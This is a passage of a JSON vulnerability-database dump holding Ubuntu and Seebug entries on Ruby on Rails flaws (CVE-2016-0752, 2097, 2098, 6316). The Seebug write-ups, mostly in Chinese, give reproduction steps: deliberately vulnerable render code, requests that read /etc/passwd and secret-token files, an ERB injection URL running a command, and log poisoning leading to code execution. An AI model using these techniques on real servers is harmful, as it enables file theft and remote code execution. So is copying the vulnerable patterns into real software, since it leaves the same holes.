"id": "UB:CVE-2016-0752", "href": "https://ubuntu.com/security/CVE-2016-0752", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:09:12", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails\n3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow\nremote attackers to inject arbitrary web script or HTML via text declared\nas \"HTML safe\" and used as attribute values in tag handlers.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=834155>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | The GnuPG project used this CVE number by mistake when doing an announcement. The GnuPG issue is actually CVE-2016-6313.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-09-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-6316", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6313", "CVE-2016-6316"], "modified": "2016-09-07T00:00:00", "id": "UB:CVE-2016-6316", "href": "https://ubuntu.com/security/CVE-2016-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "seebug": [{"lastseen": "2017-11-19T12:16:55", "description": "Possible Information Leak Vulnerability in Action View.\r\n\r\nThere is a possible directory traversal and information leak vulnerability in\r\nAction View. This was meant to be fixed on CVE-2016-0752. However the 3.2 patch was not covering\r\nall the scenarios. This vulnerability has been assigned the CVE identifier\r\nCVE-2016-2097.\r\n\r\nVersions Affected: 3.2.x, 4.0.x, 4.1.x\r\nNot affected: 4.2+\r\nFixed Versions: 3.2.22.2, 4.1.14.2\r\n\r\nImpact\r\n------\r\nApplications that pass unverified user input to the `render` method in a\r\ncontroller may be vulnerable to an information leak vulnerability.\r\n\r\nImpacted code will look something like this:\r\n\r\n```ruby\r\ndef index\r\n render params[:id]\r\nend\r\n```\r\n\r\nCarefully crafted requests can cause the above code to render files from\r\nunexpected places like outside the application's view directory, and can\r\npossibly escalate this to a remote code execution attack.\r\n\r\nAll users running an affected release should either upgrade or use one of the\r\nworkarounds immediately.\r\n\r\nReleases\r\n--------\r\nThe FIXED releases are available at the normal locations.\r\n\r\nWorkarounds\r\n-----------\r\nA workaround to this issue is to not pass arbitrary user input to the `render`\r\nmethod. Instead, verify that data before passing it to the `render` method.\r\n\r\nFor example, change this:\r\n\r\n```ruby\r\ndef index\r\n render params[:id]\r\nend\r\n```\r\n\r\nTo this:\r\n\r\n```ruby\r\ndef index\r\n render verify_template(params[:id])\r\nend\r\n\r\nprivate\r\ndef verify_template(name)\r\n # add verification logic particular to your application here\r\nend\r\n```\r\n\r\nCredits\r\n-------\r\nThanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this and working with us in the patch!", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "seebug", "title": "Ruby on Rails Action View \u4fe1\u606f\u6cc4\u6f0f", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-03-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91076", "id": "SSV:91076", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T12:16:55", "description": "### \u6f0f\u6d1e\u5e94\u7528 \r\n\u6d4b\u8bd5\u73af\u5883:Rails-4.0.13 (Ruby-2.1.5) \r\n\r\n\u6d4b\u8bd5\u7cfb\u7edf:Kali Linux 2.0\r\n\r\n\u521b\u5efa Rails \u5e94\u7528:\r\n```\r\n rails new cve-2016-2098 \r\n cd cve-2016-2098\r\n ```\r\n\u4f7f\u7528\u81ea\u5e26\u547d\u4ee4\u521b\u5efa\u63a7\u5236\u5668 vuln \u8def\u7531 index,\u5e76\u4fee\u6539\u5176\u8def\u7531\u9ed8\u8ba4\u5904\u7406\u4ee3\u7801:\r\n```\r\nrails generate scaffold User name:string desc:text age:integer \r\nrake db:migrate\r\n```\r\n\u4fee\u6539 app/controllers/users_controller.rb \u4e2d index \u51fd\u6570\u4ee3\u7801\u4e3a:\r\n```\r\nclass UsersController < ApplicationController ...\r\ndef show\r\nrender :inline => params[:q]\r\nend ...\r\n# def set_user # ..\r\n# end\r\nend\r\n```\r\n\u542f\u52a8\u5e94\u7528\u8bbf\u95ee \r\n```http://*.*.*.*:3000/users/<%25=%20`id`%20%25>```\u65f6,\u4ee3 \u7801\u4f1a\u5c06\r\n```\u201c<%= `id` %>\u201d```\u505a\u4e3a\u6a21\u677f :inline \u6e32\u67d3\u7684\u65b9\u5f0f\u5c06\u4f20\u5165\u7684\u5b57\u7b26\u4e32\u4f5c\u4e3a\u6a21 \u677f\u5185\u5bb9\u8fdb\u884c\u6e32\u67d3,\u56e0\u4e3a\u5728 Rails \u6a21\u677f\u5f15\u64ce\u4e2d,<%= [string_here] %> \u8868\u793a\u5c06\r\n[string_here] \u4f5c\u4e3a Ruby \u4ee3\u7801\u8fdb\u884c\u6267\u884c\u5e76\u5c06\u7ed3\u679c\u8fdb\u884c\u8fd4\u56de,\u6240\u4ee5\u6700\u7ec8\u8bbf\u95ee\u9875\r\n\u9762\u4f1a\u8fd4\u56de\u7cfb\u7edf\u6267\u884c id \u547d\u4ee4\u540e\u7684\u7ed3\u679c:\r\n\r\n### \u6f0f\u6d1e\u5f71\u54cd\r\n\u4ece zoomeye.org \u4e0a\u641c\u7d22\u4f7f\u7528\u4e86 Rails \u6846\u67b6\u7684\u7ad9\u70b9:\r\n\r\n\r\n\u5168\u7403\u5927\u7ea6\u6709 4w \u591a\u4e2a\u4f7f\u7528\u4e86 Rails \u7684\u7ad9\u70b9\u53ef\u80fd\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n\r\n\u540c\u65f6\u4e5f\u53ef\u4ee5\u5728 Github \u4e0a\u641c\u7d22 \u201crender :inline =>\u201d\u6765\u67e5\u770b\u6f5c\u5728\u53d7\u5230\u5f71\u54cd \u7684\u9879\u76ee:\r\n\r\n\r\n\r\n\u53ef\u4ee5\u770b\u5230\u4e5f\u6709\u5927\u91cf\u7684\u9879\u76ee\u7b26\u5408\u8fd9\u6837\u7684\u4ee3\u7801\u5199\u6cd5,\u53ef\u80fd\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n### \u76f8\u5173\u94fe\u63a5\uff1a\r\n\r\n[1] http://weblog.rubyonrails.org/2016/2/29/Rails-4-2-5-2-4-1-14-2-3-2-22-2-have-been-released/\r\n\r\n[2] https://groups.google.com/d/msg/rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\r\n\r\n[3] https://github.com/rails/rails/compare/v4.2.5.1...v4.2.5.2", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "seebug", "title": "Ruby on Rails Action Pack\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91073", "id": "SSV:91073", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:18:41", "description": "\u5982\u679c\u4f60\u7684\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528\u7684\u52a8\u6001\u6a21\u7248\u8def\u5f84 (\u4f8b\u5982: `render params[:id]`) \u90a3\u4e48\u4f60\u7684\u7a0b\u5e8f\u5c06\u4f1a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u548c\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e. \u8bf7\u628a\u4f60\u7684 Rails \u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c, \u6216\u8005\u91cd\u6784\u4f60\u7684 `controllers`\u3002\r\n\r\n\u6211\u4eec\u5c06\u5c55\u793a\u5982\u4f55\u5728\u7279\u5b9a\u73af\u5883\u4e0b\u4f7f\u7528\u4ee3\u7801\u6267\u884c\u548c\u672c\u5730\u5305\u542b\u6f0f\u6d1e\u53bb\u653b\u51fb Ruby on Rails \u3002\r\nRails\u7684\u63a7\u5236\u5668\u6709\u5305\u542b\u6307\u5b9a\u6e32\u67d3\u6587\u4ef6\u7684\u529f\u80fd\uff0c\u4e3e\u4e2a\u4f8b\u5b50, \u5f53\u6211\u4eec\u8c03\u7528 show \u65b9\u6cd5\u7684\u65f6\u5019\uff0c\u5982\u679c\u6ca1\u6709\u5b9a\u4e49\u5176\u4ed6\u6e32\u67d3\u65b9\u6cd5\uff0c\u8be5\u6846\u67b6\u5c06\u4f1a\u9690\u85cf\u6e32\u67d3 `show.html.erb` \u6587\u4ef6\u3002\r\n\r\n> \u5728\u7edd\u5927\u591a\u6570\u60c5\u51b5\u4e0b\uff0c\u5f00\u53d1\u8005\u4f1a\u8f93\u51fa\u4e0d\u540c\u7684\u683c\u5f0f\uff0c\u4f8b\u5982\uff1a\u6587\u672c, JSON, XML \u6216\u8005\u5176\u4ed6\u4efb\u4f55\u683c\u5f0f\uff0c\u6216\u8005\u67e5\u770b\u4e00\u4e2a\u6587\u4ef6, \u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b, \u5c31\u4f1a\u4f7f\u7528\u4e00\u4e2a\u53ef\u4ee5\u52a8\u6001\u6e32\u67d3\u7684\u6a21\u7248\u8bed\u8a00\uff0c\u4f8b\u5982 ERB, HAML, \u6216\u8005\u5176\u4ed6\u7684\u4ec0\u4e48. \u4f46\u662f\u6709\u51e0\u79cd\u65b9\u6cd5\u53ef\u4ee5\u4fee\u6539\u4ed6\u4eec\u5c55\u793a\u7684\u5185\u5bb9, \u5bf9\u6211\u4eec\u6765\u8bf4\uff0c\u6211\u4eec\u53ea\u8981\u76ef\u7740\u6e32\u67d3\u7684\u65b9\u6cd5\u5c31\u597d\u4e86. The Rails \u7684\u6587\u6863\u5b9a\u4e49\u4e86\u51e0\u79cd\u6e32\u67d3\u6a21\u7248\u548c\u5b9a\u4e49\u5185\u5bb9\u7684\u65b9\u6cd5 , \u5305\u62ec\u6307\u5b9a\u6a21\u7248\u7684\u8def\u5f84\u7684 `file:` \u53c2\u6570\u3002\r\n\r\n\r\n\u5982\u679c\u4f60\u5df2\u7ecf\u9605\u8bfb\u8fc7[\u89e3\u51b3\u65b9\u6cd5\u7684\u6587\u6863](http://guides.rubyonrails.org/layouts_and_rendering.html)\uff0c\u4f46\u662f\u4e0d\u786e\u5b9a\u4f60\u9700\u4e0d\u9700\u8981\u8fd9\u6837\u7684\u529f\u80fd\u2014\u2014\u5b9e\u9645\u4e0a\u5e76\u4e0d\u6b62\u4f60\u4e00\u4e2a\u4eba\u5b58\u5728\u8fd9\u6837\u7684\u7591\u60d1\u3002\u90a3\u4e48\u5148\u8ba9\u6211\u4eec\u770b\u770b\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801:\r\n\r\n```\r\ndef show\r\n render params[:template]\r\nend\r\n```\r\n\r\n\u8fd9\u4e2a\u4ee3\u7801\u770b\u8d77\u6765\u4f3c\u4e4e\u5f88\u7b80\u5355,\u4f46\u662f\u8c01\u4e5f\u60f3\u4e0d\u5230\u4e00\u4e2a\u63a7\u5236\u5668\u53ea\u662f\u4e3a\u4e86\u6e32\u67d3\u6a21\u7248, \u4ed6\u5b9a\u4e49\u4e86\u4e00\u4e2a `template` \u53c2\u6570. \u4f46\u662f\u4ed6\u6ca1\u6709\u88ab\u8fc7\u6ee4\u8fc7, \u7136\u540e Rails \u5c31\u4f1a\u53bb\u627e\u6307\u5b9a\u7684\u6a21\u7248. , \u4f46\u662f\u8fd9\u4e2a\u6a21\u7248\u5728\u54ea\u5462?\u662f views \u76ee\u5f55\uff0c\u8fd8\u662f\u6839\u76ee\u5f55\uff0c\u53c8\u6216\u8005\u662f\u5176\u4ed6\u76ee\u5f55? \u96be\u9053\u4ed6\u662f\u671f\u5f85\u4e00\u4e2a\u6a21\u677f\u6587\u4ef6\u540d\uff0c\u6216\u8005\u662f\u4e00\u4e2a\u7279\u6b8a\u540e\u7f00\u7684\u6587\u4ef6\u540d \uff0c\u8fd8\u662f\u8bf4\u4e00\u4e2a\u5b8c\u6574\u7684\u8def\u5f84? \u5e26\u7740\u8fd9\u4e9b\u672a\u77e5\u7684\u95ee\u9898\u7ee7\u7eed\u63a2\u7d22\u4e0b\u53bb\u3002\r\n\r\n<br>\r\n\r\n### \u95ee\u9898\u89e3\u7b54\r\n\r\n**\u52a8\u6001\u6e32\u67d3\u673a\u5236\u662f\u7528\u4e00\u4e2a\u51fd\u6570\u89e3\u51b3\u5927\u91cf\u95ee\u9898\u7684\u6700\u597d\u7684\u4f8b\u5b50\u3002\u8fd9\u4e5f\u5c31\u662f\u4ed6\u7684\u95ee\u9898\u6240\u5728\u3002**\r\n\r\n\u8ba9\u6211\u4eec\u5047\u8bbe\u6e32\u67d3\u673a\u5236\u662f\u4ece `app/views/user/#{params[:template]}` \u8def\u5f84\u8bfb\u53d6\u6587\u4ef6 \u2013 \u8fd9\u4f3c\u4e4e\u662f\u4e00\u4e2a\u5408\u7406\u7684\u60f3\u6cd5. \u5982\u679c\u6211\u4eec\u628a template \u53c2\u6570\u7684\u503c\u8bbe\u7f6e\u4e3a dashboard ,\u4ed6\u5c06\u52a0\u8f7d `app/views/user/dashboard.{ext}`, .ext \u662f\u4e00\u4e2a\u5728\u767d\u540d\u5355\u91cc\u7684\u540e\u7f00\u540d (\u5982 .html, .haml, .html.erb, etc.)\r\n\r\n\r\n\r\n\u90a3\u8ba9\u6211\u4eec\u73b0\u5728\u60f3\u60f3\uff0c\u5982\u679c\u628a template \u7684\u503c\u8bbe\u7f6e\u4e3a: `../admin/dashboard`. \u4ed6\u5c06\u4f1a\u8fd4\u56de\u4ec0\u4e48\u6837\u7684\u7ed3\u679c\u7ed9\u6211\u4eec\u5462? \u8fd9\u53ef\u80fd\u6bd4\u8f83\u96be\u77e5\u9053, \u4f46\u662f\u6211\u4eec\u7ecf\u8fc7\u5c1d\u8bd5\u65f6\u5019\uff0c\u4ed6\u63d0\u793a\u6211\u4eec\u7f3a\u5c11\u6a21\u7248\u3002\r\n\r\n\r\n\r\n\u901a\u8fc7\u5206\u6790\u9519\u8bef\u63d0\u793a,\u53ef\u662f\u770b\u51fa\u4ed6\u8bd5\u56fe\u4ece `RAILS_ROOT/app/views`, `RAILS_ROOT` \u548c\u7cfb\u7edf\u6839\u76ee\u5f55\u53bb\u5bfb\u627e\u6587\u4ef6. \u8fd9\u6709\u70b9\u8ba9\u4eba\u86cb\u75bc, \u56e0\u4e3a\u4ed6\u4e3a\u4ec0\u4e48\u8981\u4ece\u7cfb\u7edf\u7684\u6839\u76ee\u5f55\u53bb\u5bfb\u627e\u6211\u4eec\u9700\u8981\u7684\u6a21\u7248\u6587\u4ef6\u5462?\r\n\r\n> \u901a\u8fc7\u9ed1\u5ba2\u7684\u672c\u80fd\u53cd\u5e94\uff0c\u6211\u628a\u53c2\u6570\u7684\u5185\u5bb9\u8bbe\u7f6e\u4e3a `/etc/passwd` , \u5e76\u4e14\u6211\u4eec\u786e\u5b9e\u8bfb\u53d6\u5230\u4e86 `passwd` \u6587\u4ef6. \u8fd9\u662f\u4e00\u4e2a\u91cd\u5927\u7684\u53d1\u73b0.\r\n\r\n\r\n\r\n\u65e2\u7136\u6211\u4eec\u80fd\u591f\u8bfb\u53d6 `passwd` \u6587\u4ef6\uff0c \u90a3\u4e48\u6211\u4eec\u662f\u4e0d\u662f\u4e5f\u80fd\u8bfb\u53d6\u5e94\u7528\u7a0b\u5e8f\u7684\u6e90\u7801\u548c\u914d\u7f6e\u6587\u4ef6\u5462, \u8ba9\u6211\u4eec\u628a\u53c2\u6570\u8bbe\u7f6e\u4e3a `config/initializers/secrettoken.rb` \u770b\u770b\u3002\r\n\r\n\r\n\r\n> \u522b\u5fd8\u4e86\u662f\u4e3a\u4ec0\u4e48\u9020\u6210\u4e86\u8fd9\u6837\u7684\u6f0f\u6d1e\uff0c\u662f\u56e0\u4e3a\u4f60\u9009\u62e9\u4e86\u52a8\u6001\u8bbe\u7f6e\u6a21\u7248\u8def\u5f84\u5bfc\u81f4\u7684\u3002\r\n\r\n```\r\ndef show\r\n render params[:template]\r\nend\r\n```\r\n\r\n> \u8fd9\u53ea\u662f\u4e00\u6bb5\u7247\u6bb5\u5e76\u4e14\u7b80\u5355\u7684\u4ee3\u7801\uff0c\u5c31\u80fd\u9020\u6210\u8fd9\u6837\u7684\u6f0f\u6d1e\uff0c\u6211\u76f8\u4fe1\u6709\u4e0d\u5c11\u5f00\u53d1\u8005\u4f1a\u8fd9\u4e48\u5199\uff0c\u4f46\u662f\u8fd9\u8fd8\u4e0d\u662f\u6700\u7cdf\u7cd5\u7684\u95ee\u9898\u3002\r\n\r\n\u901a\u8fc7 Jeff Jarmoc \u7684\u4e00\u7bc7\u8bba\u6587 \"[The Anatomy of a Rails Vulnerability \u2013 CVE-2014-0130: From Directory Traversal to Shell,](http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf)\" \u6211\u4eec\u5f97\u77e5\uff0c\u53ef\u4ee5\u901a\u8fc7\u8fd9\u6837\u7684\u6f0f\u6d1e\u83b7\u53d6\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c.\r\n\r\nJeff \u7684\u8bba\u6587\u4ecb\u7ecd\u4e86\u4e00\u4e2a\u5728\u67d0\u4e9b\u7248\u672c\u7684 Rails \u62e5\u6709\u4e00\u4e2a\u76f8\u4f3c\u7684\u7f3a\u9677\uff0c Rail\u2019s implicit \u6e32\u67d3\u673a\u5236\u5141\u8bb8\u76ee\u5f55\u904d\u5386, \u6216\u8005\u66f4\u51c6\u786e\u7684\u8bf4, **\u672c\u5730\u6587\u4ef6\u5305\u542b**, \u8fd9\u662f\u4e00\u4e2a\u56e0\u4e3a\u5f00\u53d1\u8005\u5bfc\u81f4\u7684\u6f0f\u6d1e.\r\n\r\n\r\n> \u5728\u6df1\u5165\u6316\u6398\u8fd9\u4e2a\u6f0f\u6d1e\u4e4b\u524d\u6211\u4eec\u5148\u601d\u8003\u4e0b\uff0c\u6211\u4eec\u73b0\u5728\u62e5\u6709\u7684\u662f**\u672c\u5730\u5305\u542b**\uff0c\u800c\u4e0d\u662f\u76ee\u5f55\u904d\u5386. \u4e0d\u8fc7\u6211\u4eec\u62e5\u6709\u7684\u4e00\u4e2a\u4f18\u52bf\u5c31\u662f, \u6211\u4eec\u53ef\u4ee5**\u52a0\u8f7d\u53ef\u6267\u884c\u6587\u4ef6 (ERB)**. \u4f20\u7edf\u610f\u4e49\u4e0a\u6765\u8bf4\u76ee\u5f55\u904d\u5386\u53ea\u80fd\u8fd4\u56de\u4e00\u4e9b\u4e0d\u53ef\u6267\u884c\u7684\u6587\u4ef6\u5185\u5bb9, \u6bd4\u5982\u8bf4 CSV \u6587\u4ef6. \u6240\u4ee5\u4ece\u672c\u8d28\u4e0a\u6765\u8bf4, \u6211\u4eec\u4e0d\u4ec5\u53ef\u4ee5\u8bfb\u53d6\u7a0b\u5e8f\u7684\u6e90\u4ee3\u7801, \u8fd8\u53ef\u4ee5\u8bfb\u53d6\u7cfb\u7edf\u6587\u4ef6, \u800c\u4e14\u6211\u4eec\u8fd8\u80fd\u6267\u884c ruby \u4ee3\u7801\uff0c\u662f\u4e0d\u662f\u5c4c\u5c4c\u7684. \u56e0\u4e3a\u6211\u4eec\u53ef\u4ee5\u6267\u884c ruby \u4ee3\u7801, \u6240\u4ee5\u6211\u4eec\u62e5\u6709\u4e0e web server \u540c\u7ea7\u522b\u7684\u6743\u9650\u53bb\u6267\u884c\u7cfb\u7edf\u547d\u4ee4.\r\n\r\n\u4ece\u6587\u4ef6\u5305\u542b\u5230\u4ee3\u7801\u6267\u884c\uff0c\u6211\u4eec\u9700\u8981\u91c7\u7528\u4e00\u79cd\u53eb\u65e5\u5fd7\u6c61\u67d3\u7684\u624b\u6cd5, \u4f1a\u5c06\u5f53\u524d\u73af\u5883\u7684\u6bcf\u4e00\u4e2a\u8bf7\u6c42\uff0c\u5305\u62ec\u53c2\u6570\u90fd\u4f1a\u5199\u5165\u65e5\u5fd7\u6587\u4ef6 (\u6bd4\u5982\u8bf4 `development.log`). \u5c3d\u7ba1\u662f\u7eaf\u6587\u672c\u6587\u4ef6\uff0c\u53ea\u8981\u662f\u65e5\u5fd7\uff0c\u90fd\u53ef\u4ee5\u88ab\u5305\u542b\u8fdb ruby \u4ee3\u7801. \u901a\u8fc7\u4f7f\u7528\u6709\u6548\u7684 ruby \u4ee3\u7801\u4f5c\u4e3a\u53c2\u6570\u53d1\u8d77\u4e00\u4e2a\u8bf7\u6c42\u4fbf\u53ef\u4ee5\u5b8c\u6210\u4e0a\u8ff0\u8fc7\u7a0b\u3002\r\n\r\n\u5728\u4e0b\u9762\u7684\u4f8b\u5b50\u4e2d\u6211\u4eec\u5411 web \u7a0b\u5e8f\u53d1\u8d77\u4e00\u4e2a\u5408\u6cd5\u7684\u8bf7\u6c42\uff0c\u901a\u8fc7 fake \u53c2\u6570\u4f20\u5165\u4e00\u4e2aURL\u7f16\u7801\u7684`<%= `ls` %>`\u3002\r\n\r\n\r\n\r\n\u901a\u8fc7\u5bf9\u65e5\u5fd7\u6587\u4ef6\u7684\u5ba1\u8ba1\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u65e5\u5fd7\u4e2d\u5b58\u5728\u8fd9\u4e48\u4e00\u6761 url decode \u540e\u7684\u53c2\u6570\u6761\u76ee\uff0c\u8fd9\u662f\u4e00\u4e2a\u6709\u6548\u7684 ruby \u4ee3\u7801\uff0c\u5f53 web \u5e94\u7528\u6e32\u67d3\u4e86\u8be5\u65e5\u5fd7\u6587\u4ef6\uff0c\u4ee3\u7801\u5c31\u4f1a\u88ab\u6267\u884c\u3002\r\n\r\n\r\n\r\n\u7136\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u7528 ruby \u7684\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c06\u5305\u542b\u521a\u624d\u7684\u8bf7\u6c42\u7684\u65e5\u5fd7\u5305\u542b\u5c3d\u91cf\uff0c\u521a\u521a\u7684\u53c2\u6570\u5c31\u4f1a\u6267\u884c\u3002\r\n\r\n\r\n\r\n\u5f53\u8bf7\u6c42\u8fd4\u56de\u540e\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c\u539f\u6765\u7684 fake \u53c2\u6570\u7684\u503c\u5df2\u7ecf\u88ab `ls` \u547d\u4ee4\u7684\u503c\u66ff\u4ee3\u3002\u901a\u8fc7\u5982\u4e0a\u7684\u65b9\u6cd5\u4e5f\u53ef\u4ee5\u6267\u884c\u5176\u4ed6\u7684\u547d\u4ee4\u4e86\u3002\r\n\r\n<br>\r\n\r\n### \u7ed3\u8bba\r\n\r\n\u5982\u679c\u4e0d\u53bb\u6df1\u5165\u5730\u6316\u6398\u7ec6\u8282\u6216\u8005\u79ef\u6781\u5730\u5c1d\u8bd5 exploit\uff0cRails \u7684\u6e32\u67d3\u673a\u5236\u5c06\u662f\u5f88\u795e\u79d8\u5f88\u96be\u7406\u89e3\u7684\u3002\u5f88\u9057\u61be\uff0cRails \u7684\u53c2\u8003\u6587\u6863\u5728\u8fd9\u65b9\u9762\u5e76\u6ca1\u6709\u591a\u5927\u5e2e\u52a9\u3002\r\n\r\n\u548c CVE-2014-0130 \u7c7b\u4f3c\uff0c \u4f7f\u7528\u52a8\u6001\u6a21\u677f\u6e32\u67d3\u9020\u6210\u4e86\u76ee\u5f55\u904d\u5386\u548c\u4ee3\u7801\u6267\u884c\u3002\u6211\u5df2\u7ecf\u4e0d\u6b62\u4e00\u6b21\u5730\u5728\u5f88\u591a\u5f00\u6e90 Rails \u9879\u76ee\u4e2d\u770b\u5230\u8fc7\u5b58\u5728\u8fd9\u79cd\u6f0f\u6d1e\u4e86\u3002\u5982\u679c\u4f60\u8fd8\u6ca1\u6709\u8bfb\u8fc7 Jeff Jarmoc \u7684\u90a3\u7bc7\u8bba\u6587\uff0c\u6211\u5efa\u8bae\u6700\u597d\u5148\u9605\u8bfb\u4e00\u4e0b\uff0c\u8fd9\u7bc7\u6587\u7ae0\u6df1\u5165\u5730\u6316\u6398\u4e86\u4e0e CVE-2014-0130 \u76f8\u5173\u7684\u6f0f\u6d1e\u548c\u5371\u5bb3\u8bc4\u4f30\u3002\r\n\r\n\u8fd9\u662f\u6211\u5199\u7684\u53ef\u4ee5\u63a2\u6d4b\u548c\u5229\u7528\u672c\u6587\u6240\u8ff0\u6f0f\u6d1e\u7684 msf module: : https://gist.github.com/forced-request/5158759a6418e6376afb\r\n\r\n\r\n\r\n \r\n> \u4ee5\u4e0a\u4e2d\u6587\u7ffb\u8bd1\u6765\u81ea\u4e8e\uff1ahttps://www.92aq.com/2016/01/27/ruby-on-rails-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C.html\r\n> \u82f1\u6587\u539f\u6587\u5730\u5740\uff1ahttps://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/\r\n\r\n\r\n<br>\r\n\r\n### \u65f6\u95f4\u7ebf\r\n\r\n* 2015\u5e742\u67081\u65e5 \u6f0f\u6d1e\u88ab\u53d1\u73b0\r\n* 2015\u5e742\u670810\u65e5 Rails team \u51b3\u5b9a\u4fee\u590d\u8be5\u6f0f\u6d1e\r\n* 2015\u5e747\u670813\u65e5 \u6f0f\u6d1e\u5728\u672a\u516c\u5f00\u60c5\u51b5\u4e0b\u5f97\u5230\u8bc1\u5b9e\uff08\u8ddd\u7b2c\u4e00\u6b21\u62a5\u544a\u8be5\u6f0f\u6d1e\u5df2\u7ecf\u6709 5 \u4e2a\u6708\u65f6\u95f4\uff09\r\n* 2016\u5e741\u670825\u65e5 \u9488\u5bf9\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\u6b63\u5f0f\u53d1\u5e03\uff0c\u5e76\u4e14\u8be5\u6f0f\u6d1e\u88ab CVE \u6536\u5f55\uff08\u8fd1 5 \u4e2a\u6708\u624d\u8bc1\u5b9e\u8be5\u6f0f\u6d1e\uff0c\u5c06\u8fd1 1 \u5e74\u624d\u4fee\u590d\u8be5\u6f0f\u6d1e\uff09\r\n* 2016\u5e741\u670827\u65e5 Seebug \u6536\u5f55\u8be5\u6f0f\u6d1e\r\n\r\n<br/>\r\n\r\n### \u6f0f\u6d1e\u8bc1\u660e\r\n\r\n**\u6f0f\u6d1e\u5e94\u7528**\r\n\r\n\u6d4b\u8bd5\u73af\u5883\uff1aRails-4.1.5 (Ruby-2.1.5)\r\n\u6d4b\u8bd5\u7cfb\u7edf\uff1aKali Linux 2.0\r\n\r\n\u521b\u5efa Rails \u5e94\u7528\uff1a\r\n\r\n```\r\nrails new cve-2016-0752\r\ncd cve-2016-0752\r\n```\r\n\r\n\u4f7f\u7528\u81ea\u5e26\u547d\u4ee4\u521b\u5efa\u63a7\u5236\u5668`vuln`\u8def\u7531`index`\uff0c\u5e76\u4fee\u6539\u5176\u8def\u7531\u9ed8\u8ba4\u5904\u7406\u4ee3\u7801\uff1a\r\n\r\n```\r\nrails generate controller vuln index\r\n```\r\n\r\n\u4fee\u6539`app/controllers/vuln_controller.rb`\u4e2d`index`\u51fd\u6570\u4ee3\u7801\u4e3a\uff1a\r\n\r\n```\r\nclass VulnController < ApplicationController\r\n def index\r\n render params[:q]\r\n end\r\nend\r\n```\r\n\r\n\u542f\u52a8\u5e94\u7528\u8bbf\u95ee `http://192.168.199.205:3000/vuln/index?q=/etc/passwd` \u65f6\uff0c\u4ee3\u7801\u4f1a\u5c06 `/etc/passwd` \u505a\u4e3a\u6a21\u7248\u76f8\u5bf9\u4f7f\u7528\u51fd\u6570 render \u8fdb\u884c\u6e32\u67d3\uff0c\u800c render \u51fd\u6570\u5728\u5bfb\u627e\u6a21\u7248\u6587\u4ef6\u65f6\u9ed8\u8ba4\u5305\u542b\u4e86\u7cfb\u7edf\u6839\u8def\u5f84\uff0c\u5728\u5e94\u7528\u9ed8\u8ba4\u7684\u6a21\u7248\u5b58\u50a8\u8def\u5f84\u4e2d\u65e0\u6cd5\u627e\u5230 `/etc/passwd` \u65f6\u56de\u53bb\u5bfb\u627e 